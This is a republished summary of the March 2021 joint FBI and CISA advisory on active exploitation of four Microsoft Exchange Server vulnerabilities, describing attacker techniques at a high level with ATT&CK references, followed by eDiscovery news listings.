Compromised? Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server Vulnerabilities

According to the recent FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server vulnerabilities, these vulnerabilities allow an attacker to access a victims’ Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. It has the potential to affect tens of thousands of systems in the United States and provides adversaries with access to networks containing valuable research, technology, personally identifiable information (PII), and other sensitive information from entities in multiple U.S. sectors.

en flag
nl flag
et flag
fi flag
fr flag
de flag
pt flag
ru flag
es flag

Content Assessment: Compromised? Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server Vulnerabilities

Information - 95%
Insight - 95%
Relevance - 95%
Objectivity - 95%
Authority - 95%

95%

Excellent

A short percentage-based assessment of the qualitative benefit of the post highlighting the Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server vulnerabilities.

Editor’s Note: According to Cybersecurity and Infrastructure Security Agency (CISA), active exploitation of vulnerabilities in Microsoft Exchange Server products has been observed. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services. The following joint advisory from CISA and the Federal Bureau of Intelligence (FBI) highlights the cyber threat associated with this active exploitation of vulnerabilities.

Joint Cybersecurity Advisory from the Federal Bureau of Investigation (FBI) and the Cybersecurity Infrastructure Agency (CISA)*

Compromise of Microsoft Exchange Server

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the ATT&CK for Enterprise framework for referenced threat actor techniques and for mitigations.

Summary

This Advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of vulnerabilities in Microsoft Exchange on-premises products. The FBI and CISA assess that nation-state actors and cyber criminals are likely among those exploiting these vulnerabilities. The exploitation of Microsoft Exchange on-premises products poses a serious risk to Federal Civilian Executive Branch agencies and private companies. Successful exploitation of these vulnerabilities allows an attacker to access victims’ Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. It has the potential to affect tens of thousands of systems in the United States and provides adversaries with access to networks containing valuable research, technology, personally identifiable information (PII), and other sensitive information from entities in multiple U.S. sectors. FBI and CISA assess that adversaries will continue to exploit this vulnerability to compromise networks and steal information, encrypt data for ransom, or even execute a destructive attack. Adversaries may also sell access to compromised networks on the dark web.

On March 2, 2021, Microsoft and Volexity announced the detection of multiple zero-day exploits used to target vulnerabilities in on-premises versions of Microsoft Exchange Servers. In light of this public announcement, FBI and CISA assess that other capable cyber actors are attempting to exploit these vulnerabilities before victims implement the Microsoft updates.

The FBI and CISA have reports of malicious cyber actors using zero-day exploits CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to gain access [T1190] to on-premises Microsoft Exchange servers of U.S. entities as early as January 2021. Various Tactics, Techniques, and Procedures (TTPs) have been identified, but the actor(s) frequently appeared to be writing webshells [T1505.003] to disk for initial persistence, conducting further operations to dump user credentials [T1003], adding/deleting user accounts as needed [T1136], stealing copies of the Active Directory database (NTDS.dit) [T1003.003], and moving laterally to other systems and environments. The actors appear to be collecting [T1114], compressing [T1560.001], and exfiltrating mailbox data.

This information has been shared with multiple U.S. government (USG) agencies and partners.

The FBI is proactively investigating this malicious cyber activity, leveraging specially trained cyber squads in each of its 56 field offices, and CyWatch, the FBI’s 24/7 operations center and watch floor, which provides around-the-clock support to track incidents and communicate with field offices across the country and partner agencies. Sharing technical and/or qualitative information with the FBI and CISA helps empower and amplify our capabilities as federal partners to collect and share intelligence and engage with victims while working to unmask—and hold accountable—those conducting cyber activities.

See the CISA Remediating Microsoft Exchange Vulnerabilities web page for both executive- and technical-level guidance. Additionally, refer to the following CISA Alert for full technical details that address the four vulnerabilities in Microsoft Exchange Servers and associated IOCs.


Read the Complete Advisory (PDF)

Joint Cybersecurity Advisory – Compromise of Microsoft Exchange Server – 031021

Read the advisory from the original source.


Background Information

What is the Cybersecurity and Infrastructure Security Agency? The Cybersecurity and Infrastructure Security Agency (CISA) is the Nation’s risk advisor, working with partners to defend against today’s threats and collaborating to build more secure and resilient infrastructure for the future. CISA builds the national capacity to defend against cyber attacks and works with the federal government to provide cybersecurity tools, incident response services and assessment capabilities to safeguard the ‘.gov’ networks that support the essential operations of partner departments and agencies.

What is the FBI? The FBI is an intelligence-driven and threat-focused national security organization with both intelligence and law enforcement responsibilities. It is the principal investigative arm of the U.S. Department of Justice and a full member of the U.S. Intelligence Community. The FBI has the authority and responsibility to investigate specific crimes assigned to it and to provide other law enforcement agencies with cooperative services, such as fingerprint identification, laboratory examinations, and training. The FBI also gathers, shares, and analyzes intelligence, both to support its own investigations and those of its partners and to better understand and combat the security threats facing the United States.

*Shared with permission under Creative Commons – Attribution (BY) 4.0 – license.

Additional Reading

Source: ComplexDiscovery

Have a Request?

If you have information or offering requests that you would like to ask us about, please let us know and we will make our response to you a priority.

ComplexDiscovery is an online publication that highlights data and legal discovery insight and intelligence ranging from original research to aggregated news for use by business, information technology, and legal professionals. The highly targeted publication seeks to increase the collective understanding of readers regarding data and legal discovery information and issues and to provide an objective resource for considering trends, technologies, and services related to electronically stored information.

ComplexDiscovery OÜ is a technology marketing firm providing strategic planning and tactical execution expertise in support of data and legal discovery organizations. Registered as a private limited company in the European Union country of Estonia, one of the most digitally advanced countries in the world, ComplexDiscovery OÜ operates virtually worldwide to deliver marketing consulting and services.

A SOLID Look from Europe? Legal Tech Merger and Acquisition Activity with Mike Bryant and John Jacobs

From Special Purpose Acquisition Companies (SPACs) to the recent flurry of...

Gimmal Acquires Sherpa Software

According to Mark Johnson, Chief Executive Officer at Gimmal, "With the...

Magnet Forensics Closes $115 Million IPO

According to Adam Belsher, Magnet Forensics' CEO, "I'm proud of the...

XDD Acquires Paralaw

According to Bob Polus, XDD Founder and CEO, “As part of...

A New Era in eDiscovery? Framing Market Growth Through the Lens of Six Eras

There are many excellent resources for considering chronological and historiographical approaches...

An eDiscovery Market Size Mashup: 2020-2025 Worldwide Software and Services Overview

While the Compound Annual Growth Rate (CAGR) for worldwide eDiscovery software...

Resetting the Baseline? eDiscovery Market Size Adjustments for 2020

An unanticipated pandemeconomic-driven retraction in eDiscovery spending during 2020 has resulted...

Home or Away? New eDiscovery Collection Market Sizing and Pricing Considerations

One of the key home (onsite) or away (remote) decisions that...

Five Great Reads on eDiscovery for April 2021

From X-Road® and risk management to business confidence and cybersecurity, the...

Five Great Reads on eDiscovery for March 2021

From data breach economics and vulnerabilities to private-equity investments and vendor...

Five Great Reads on eDiscovery for February 2021

From litigation trends and legal tech investing to facial recognition and...

Five Great Reads on eDiscovery for January 2021

From eDiscovery business confidence and operational metrics to merger and acquisition...

Considering Cyber Discovery? A Strategic Framework from HaystackID™

Cyber Discovery can be defined as the application of a combination...

Gimmal Acquires Sherpa Software

According to Mark Johnson, Chief Executive Officer at Gimmal, "With the...

Got Interoperability? CloudNine Launches Discovery Portal

According to Jacob Hesse, VP of Product at CloudNine, “Discovery Portal...

Magnet Forensics Closes $115 Million IPO

According to Adam Belsher, Magnet Forensics' CEO, "I'm proud of the...

Ready for Takeoff? Eighteen Observations on eDiscovery Business Confidence in the Spring of 2021

In the spring of 2021, 60.0% of eDiscovery Business Confidence Survey...

Issues Impacting eDiscovery Business Performance: A Spring 2021 Overview

In the spring of 2021, 25.0% of respondents viewed budgetary constraints...

Happy Days are Near Again? eDiscovery Operational Metrics in the Spring of 2021

In the spring of 2021, 93 eDiscovery Business Confidence Survey participants...

A Splash of Optimism? Spring 2021 eDiscovery Business Confidence Survey Results

This is the twenty-second quarterly eDiscovery Business Confidence Survey conducted by...